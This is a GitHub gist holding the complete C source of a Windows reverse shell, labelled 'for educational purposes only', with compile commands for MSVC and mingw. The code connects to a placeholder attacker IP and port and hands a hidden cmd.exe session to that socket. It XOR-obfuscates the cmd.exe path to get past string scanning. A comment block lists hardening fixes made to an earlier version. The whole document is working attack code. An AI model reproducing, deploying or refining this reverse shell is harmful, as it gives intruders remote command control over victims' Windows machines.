@qtc-de
Last active January 30, 2022 15:26
Simple Windows reverse shell. For educational purposes only!
/*
* Simple Windows reverse shell. For educational purposes only!
*
* Connects back over plain, unencrypted TCP to REMOTE_IP:REMOTE_PORT and
* attaches cmd.exe to that socket as its stdin/stdout/stderr. Replace the
* <IP> and <PORT> placeholders below before compiling: the <PORT> placeholder
* is not valid C, so the listing does not build as-is. The cmd.exe path is
* only XOR-obfuscated with a hard-coded key (string hiding, not encryption).
*
* Compile on Windows (developer prompt):
* C:\> cl windows-reverse-shell.c
*
* Compile on Linux (mingw):
* $ x86_64-w64-mingw32-gcc windows-reverse-shell.c -o shell.exe -lws2_32
*/
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32")
#define REMOTE_IP "<IP>"
#define REMOTE_PORT <PORT>
/* File-scope state used by main(); static storage, so all zero at load. */
long nError;              /* last GetLastError()/WSAGetLastError() value, printed by main() */
WSADATA wsaData;          /* filled in by WSAStartup() */
SOCKET Winsock;           /* TCP socket to the listener; also handed to the child as its std handles */
SOCKET Sock;              /* declared but not referenced anywhere in this listing */
struct sockaddr_in hax;   /* listener address built from REMOTE_IP / REMOTE_PORT */
char ip_addr[16];         /* dotted-quad scratch buffer for the resolved address (15 chars + NUL) */
STARTUPINFO si;           /* child start-up info (STARTF_USESTDHANDLES, std handles = Winsock) */
PROCESS_INFORMATION pi;   /* handles and ids of the spawned cmd.exe */
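/*
 * Entry point: connect back to REMOTE_IP:REMOTE_PORT over plain TCP and
 * spawn cmd.exe with its stdin/stdout/stderr bound to that socket.
 *
 * Returns 0 once the child process has been created. On any failure
 * (Winsock init, socket creation, name resolution, connect, CreateProcess)
 * the Win32/Winsock error code is printed to stdout and the process exits
 * with status 1.
 *
 * Defects fixed relative to the original listing:
 *  - WSAStartup(), WSASocket() and gethostbyname() results are checked;
 *    the original dereferenced a NULL hostent when the lookup failed.
 *  - WSAConnect() is judged by its return value. The original consulted
 *    WSAGetLastError(), which is not reset on success and may be stale.
 *  - The decoded command string is NUL-terminated. The original wrote 27
 *    bytes into command[28] and left command[27] uninitialized, so
 *    CreateProcess() read past the end of the path.
 *  - The resolved address is copied straight into sin_addr, dropping the
 *    inet_ntoa()/strcpy()/inet_addr() round trip through a 16-byte buffer.
 *  - Error messages use "[-]" and %ld (nError is a long).
 *  - Socket and process handles are released before returning.
 *
 * Still by design: the channel is unencrypted and the listener is not
 * authenticated in any way.
 */
int main()
{
    /* "C:\Windows\System32\cmd.exe", each byte XORed with the key below.
     * Plain XOR with a hard-coded key: this hides the string from a casual
     * strings(1) pass, it is not encryption. */
    static const char enc_cmd[] =
        "\x22\x02\x3d\x16\x11\x50\x40\x40\x46\x12\x24\x2b\x45\x42\x45\x01\x55\x02\x03\x6b\x52\x5c\x56\x1d\x0b\x19\x0d";
    static const char xor_key[] = "a8aAx>$/1axx<11d81171123nah";
    enum { CMD_LEN = 27 };              /* both literals are 27 bytes */
    char command[CMD_LEN + 1];          /* +1 for the terminating NUL */

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        nError = WSAGetLastError();
        printf("[-] WSAStartup(... - Error: %ld\n", nError);
        exit(1);
    }

    /* dwFlags is deliberately 0, as in the original (no WSA_FLAG_OVERLAPPED);
     * presumably so the handle can be inherited as a plain std handle by
     * the child -- keep it that way. */
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (Winsock == INVALID_SOCKET) {
        nError = WSAGetLastError();
        printf("[-] WSASocket(... - Error: %ld\n", nError);
        WSACleanup();
        exit(1);
    }

    /* Resolve the listener. gethostbyname() returns NULL on failure; the
     * original cast host->h_addr without this check. */
    struct hostent *host = gethostbyname(REMOTE_IP);
    if (host == NULL || host->h_addrtype != AF_INET ||
        host->h_length != (int)sizeof(hax.sin_addr) ||
        host->h_addr_list[0] == NULL) {
        nError = WSAGetLastError();
        printf("[-] gethostbyname(... - Error: %ld\n", nError);
        closesocket(Winsock);
        WSACleanup();
        exit(1);
    }

    memset(&hax, 0, sizeof(hax));
    hax.sin_family = AF_INET;
    hax.sin_port = htons(REMOTE_PORT);
    /* Binary IPv4 address straight from the hostent; equivalent to the
     * original inet_addr(inet_ntoa(...)) round trip without the strcpy. */
    memcpy(&hax.sin_addr, host->h_addr_list[0], sizeof(hax.sin_addr));

    if (WSAConnect(Winsock, (SOCKADDR *)&hax, sizeof(hax), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        nError = WSAGetLastError();
        printf("[-] WSAConnect(... - Error: %ld\n", nError);
        closesocket(Winsock);
        WSACleanup();
        exit(1);
    }

    /* Recover the command line and terminate it; CreateProcess() reads
     * lpCommandLine as a NUL-terminated (and writable) string. */
    for (int i = 0; i < CMD_LEN; ++i)
        command[i] = (char)(enc_cmd[i] ^ xor_key[i]);
    command[CMD_LEN] = '\0';

    /* Redirect the child's std handles to the connected socket. Handle
     * inheritance (bInheritHandles = TRUE) is what lets the child use it. */
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)Winsock;

    if (!CreateProcess(NULL, command, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        nError = GetLastError();
        printf("[-] CreateProcess(... - Error: %ld\n", nError);
        closesocket(Winsock);
        WSACleanup();
        exit(1);
    }
    printf("[+] Process created.\n");

    /* The child holds its own inherited copy of the socket, so releasing
     * our handles here does not tear down the connection; it only makes
     * explicit what process exit would otherwise do implicitly. */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    closesocket(Winsock);
    WSACleanup();
    return 0;
}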